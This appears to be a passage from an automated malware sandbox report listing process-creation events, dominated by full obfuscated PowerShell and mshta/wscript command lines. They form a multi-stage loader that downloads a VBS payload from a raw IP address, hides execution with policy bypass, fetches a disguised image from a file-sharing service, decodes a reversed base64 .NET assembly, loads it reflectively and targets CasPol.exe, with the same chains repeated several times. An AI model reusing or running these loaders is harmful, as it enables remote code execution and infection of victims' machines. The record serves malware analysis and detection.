INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdv0ziagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc10exblicagicagicagicagicagicagicagicagicagicagicagic1tzw1czxjezwzjbkluaw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbuy2twtgosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifzjvixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrvhsblbkcnbouwmsdwludcagicagicagicagicagicagicagicagicagicagicagicbirwp6leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5wlztc0rnzgrpktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpqxl3bmkiicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu1bhq2ugicagicagicagicagicagicagicagicagicagicagicagsxjseiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq1dgy6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjkvnduvc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmvhdc50suyilcikru5wokfquerbvefcc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmuudmjtiiwwldapo3n0qxjulxnsruvwkdmpo0lfwcagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzwhhdmluz2zhy2luz2jlc3r0aglnbnn0b2dldg1lymfja3dpdghlbnrpcmv0aw1lz3jllnziuyi='+[char]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicr2zxjcb1nlchjfrmvyzu5dzs5ut3n0cklurygpwzesm10rj1gnluppau4njykokcdvcglpbwfnzvvybca9iglmzgh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0jysnnxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9jysnzmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygawzko29waxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7b3bpaw1hz2vcexrlcya9ig9waxdlyknsawvudc5eb3dubg9hzerhdgeob3bpaw1hz2vvcmwpo29wawltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkg8nkydwawltywdlqnl0zxmpo29waxn0yxj0rmxhzya9iglmzdw8qkftrty0x1nuqvjupj5pzmq7b3bpzw5krmxhzya9iglmzdw8qkftrty0x0vord4+awzko29waxn0yxj0sw5kzxggpsbvcglpbwfnzvrlehqusw5kzxhpzihvjysncglzjysndgfydezsywcpo29wawvuzeluzgv4id0gb3bpaw1hz2vuzxh0lkluzgv4t2yob3bpzw5krmxhzyk7b3bpc3rhcnrjbmrlecatjysnz2ugmcatyw5kig9wawvuzeluzgv4ic1ndcbvcglzdgfydeluzgunkyd4o29waxn0yxj0sw5kzxggkz0gb3bpc3rhcnrgbgfnlkxlbmd0adtvcccrj2liyxnlnjrmzw5ndgggpsbvcgllbmrjbmrlecatig9waxn0yxj0sw5kzxg7b3bpymfzzty0q29tbwfuzca9ig9wawltywdlvgv4dc5tdwjzdccrj3jpbmcob3bpc3rhcnqnkydjbmrlecwgb3bpymfzzty0tgvuz3rokttvcgliyxnlnjrszxzlcnnlzca9ic1qbycrj2luichvcgliyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgmfenkydsiezvckvhy2gtt2jqzwn0ihsgb3bpxyb9kvsnkyctms4ulshvcgliyxnlnjrdb21tyw5klkxlbmd0acldo29wawnvbw1hbmrcexrlcya9ifttescrj3n0zw0uq29udicrj2unkydydf06okzyb21cyxnljysnnjrtdhjpbmcob3bpymfzzty0umv2zxjzzwqpo29wawxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw8nkydulkfzc2vtymx5xto6tg9hzchvcgljb21tyw5kqnl0zxmpo29waxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoawynkydkvkfjawzkjysnkttvcgl2ywlnzxrob2qusw52b2tlkg9waw51bgwsieaoawzkdhh0lkderfjesc81nc85mi4nkycwmjiumy4yotevlzpwdhroawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrdyxnqb2xpzmqsiglmzgrlc2f0axynkydhzg8nkydpzmqsiglmzgrlc2f0jysnaxzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdgl2ywrvawzklglmzgrlc2f0axzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdccrj2l2ywrvawzklglmzdfpzmqsawzkzgvzyxrpdmfkb2lmjysnzckpoycplnjluexbq2uojzbrbccsw1n0cmlur11bq2hbcl0xmjqplnjluexbq2uoj2lmzccsw1n0cmlur11bq2hbcl0zoskucmvqtefdzsgow0noqxjdmtexk1tdaefyxtexmitbq2hbcl0xmduplcckjykp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $verbosepreference.tostring()[1,3]+'x'-join'')(('opiimageurl = ifdhttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu4'+'5t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebclient = new-object system.net.webclient;opiimagebytes = opiwebclient.downloaddata(opiimageurl);opiimagetext = [system.text.encoding]::utf8.getstring(o'+'piimagebytes);opistartflag = ifd<<base64_start>>ifd;opiendflag = ifd<<base64_end>>ifd;opistartindex = opiimagetext.indexof(o'+'pis'+'tartflag);opiendindex = opiimagetext.indexof(opiendflag);opistartindex -'+'ge 0 -and opiendindex -gt opistartinde'+'x;opistartindex += opistartflag.length;op'+'ibase64length = opiendindex - opistartindex;opibase64command = opiimagetext.subst'+'ring(opistart'+'index, opibase64length);opibase64reversed = -jo'+'in (opibase64command.tochararray() 0q'+'l foreach-object { opi_ })['+'-1..-(opibase64command.length)];opicommandbytes = [sy'+'stem.conv'+'e'+'rt]::frombase'+'64string(opibase64reversed);opiloadedassembly = [system.reflectio'+'n.assembly]::load(opicommandbytes);opivaimethod = [dnlib.io.home].getmethod(if'+'dvaiifd'+');opivaimethod.invoke(opinull, @(ifdtxt.gddrdh/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdcaspolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').replace('0ql',[string][char]124).replace('ifd',[string][char]39).replace(([char]111+[char]112+[char]105),'$'))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdv0ziagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc10exblicagicagicagicagicagicagicagicagicagicagicagic1tzw1czxjezwzjbkluaw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbuy2twtgosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifzjvixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrvhsblbkcnbouwmsdwludcagicagicagicagicagicagicagicagicagicagicagicbirwp6leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5wlztc0rnzgrpktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpqxl3bmkiicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu1bhq2ugicagicagicagicagicagicagicagicagicagicagicagsxjseiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq1dgy6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjkvnduvc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmvhdc50suyilcikru5wokfquerbvefcc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmuudmjtiiwwldapo3n0qxjulxnsruvwkdmpo0lfwcagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzwhhdmluz2zhy2luz2jlc3r0aglnbnn0b2dldg1lymfja3dpdghlbnrpcmv0aw1lz3jllnziuyi='+[char]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicr2zxjcb1nlchjfrmvyzu5dzs5ut3n0cklurygpwzesm10rj1gnluppau4njykokcdvcglpbwfnzvvybca9iglmzgh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0jysnnxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9jysnzmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygawzko29waxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7b3bpaw1hz2vcexrlcya9ig9waxdlyknsawvudc5eb3dubg9hzerhdgeob3bpaw1hz2vvcmwpo29wawltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkg8nkydwawltywdlqnl0zxmpo29waxn0yxj0rmxhzya9iglmzdw8qkftrty0x1nuqvjupj5pzmq7b3bpzw5krmxhzya9iglmzdw8qkftrty0x0vord4+awzko29waxn0yxj0sw5kzxggpsbvcglpbwfnzvrlehqusw5kzxhpzihvjysncglzjysndgfydezsywcpo29wawvuzeluzgv4id0gb3bpaw1hz2vuzxh0lkluzgv4t2yob3bpzw5krmxhzyk7b3bpc3rhcnrjbmrlecatjysnz2ugmcatyw5kig9wawvuzeluzgv4ic1ndcbvcglzdgfydeluzgunkyd4o29waxn0yxj0sw5kzxggkz0gb3bpc3rhcnrgbgfnlkxlbmd0adtvcccrj2liyxnlnjrmzw5ndgggpsbvcgllbmrjbmrlecatig9waxn0yxj0sw5kzxg7b3bpymfzzty0q29tbwfuzca9ig9wawltywdlvgv4dc5tdwjzdccrj3jpbmcob3bpc3rhcnqnkydjbmrlecwgb3bpymfzzty0tgvuz3rokttvcgliyxnlnjrszxzlcnnlzca9ic1qbycrj2luichvcgliyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgmfenkydsiezvckvhy2gtt2jqzwn0ihsgb3bpxyb9kvsnkyctms4ulshvcgliyxnlnjrdb21tyw5klkxlbmd0acldo29wawnvbw1hbmrcexrlcya9ifttescrj3n0zw0uq29udicrj2unkydydf06okzyb21cyxnljysnnjrtdhjpbmcob3bpymfzzty0umv2zxjzzwqpo29wawxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw8nkydulkfzc2vtymx5xto6tg9hzchvcgljb21tyw5kqnl0zxmpo29waxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoawynkydkvkfjawzkjysnkttvcgl2ywlnzxrob2qusw52b2tlkg9waw51bgwsieaoawzkdhh0lkderfjesc81nc85mi4nkycwmjiumy4yotevlzpwdhroawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrdyxnqb2xpzmqsiglmzgrlc2f0axynkydhzg8nkydpzmqsiglmzgrlc2f0jysnaxzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdgl2ywrvawzklglmzgrlc2f0axzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdccrj2l2ywrvawzklglmzdfpzmqsawzkzgvzyxrpdmfkb2lmjysnzckpoycplnjluexbq2uojzbrbccsw1n0cmlur11bq2hbcl0xmjqplnjluexbq2uoj2lmzccsw1n0cmlur11bq2hbcl0zoskucmvqtefdzsgow0noqxjdmtexk1tdaefyxtexmitbq2hbcl0xmduplcckjykp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $verbosepreference.tostring()[1,3]+'x'-join'')(('opiimageurl = ifdhttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu4'+'5t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebclient = new-object system.net.webclient;opiimagebytes = opiwebclient.downloaddata(opiimageurl);opiimagetext = [system.text.encoding]::utf8.getstring(o'+'piimagebytes);opistartflag = ifd<<base64_start>>ifd;opiendflag = ifd<<base64_end>>ifd;opistartindex = opiimagetext.indexof(o'+'pis'+'tartflag);opiendindex = opiimagetext.indexof(opiendflag);opistartindex -'+'ge 0 -and opiendindex -gt opistartinde'+'x;opistartindex += opistartflag.length;op'+'ibase64length = opiendindex - opistartindex;opibase64command = opiimagetext.subst'+'ring(opistart'+'index, opibase64length);opibase64reversed = -jo'+'in (opibase64command.tochararray() 0q'+'l foreach-object { opi_ })['+'-1..-(opibase64command.length)];opicommandbytes = [sy'+'stem.conv'+'e'+'rt]::frombase'+'64string(opibase64reversed);opiloadedassembly = [system.reflectio'+'n.assembly]::load(opicommandbytes);opivaimethod = [dnlib.io.home].getmethod(if'+'dvaiifd'+');opivaimethod.invoke(opinull, @(ifdtxt.gddrdh/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdcaspolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').replace('0ql',[string][char]124).replace('ifd',[string][char]39).replace(([char]111+[char]112+[char]105),'$'))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdv0ziagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc10exblicagicagicagicagicagicagicagicagicagicagicagic1tzw1czxjezwzjbkluaw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbuy2twtgosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifzjvixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrvhsblbkcnbouwmsdwludcagicagicagicagicagicagicagicagicagicagicagicbirwp6leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5wlztc0rnzgrpktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpqxl3bmkiicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu1bhq2ugicagicagicagicagicagicagicagicagicagicagicagsxjseiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq1dgy6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjkvnduvc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmvhdc50suyilcikru5wokfquerbvefcc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmuudmjtiiwwldapo3n0qxjulxnsruvwkdmpo0lfwcagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzwhhdmluz2zhy2luz2jlc3r0aglnbnn0b2dldg1lymfja3dpdghlbnrpcmv0aw1lz3jllnziuyi='+[char]34+'))')))"Jump to behavior
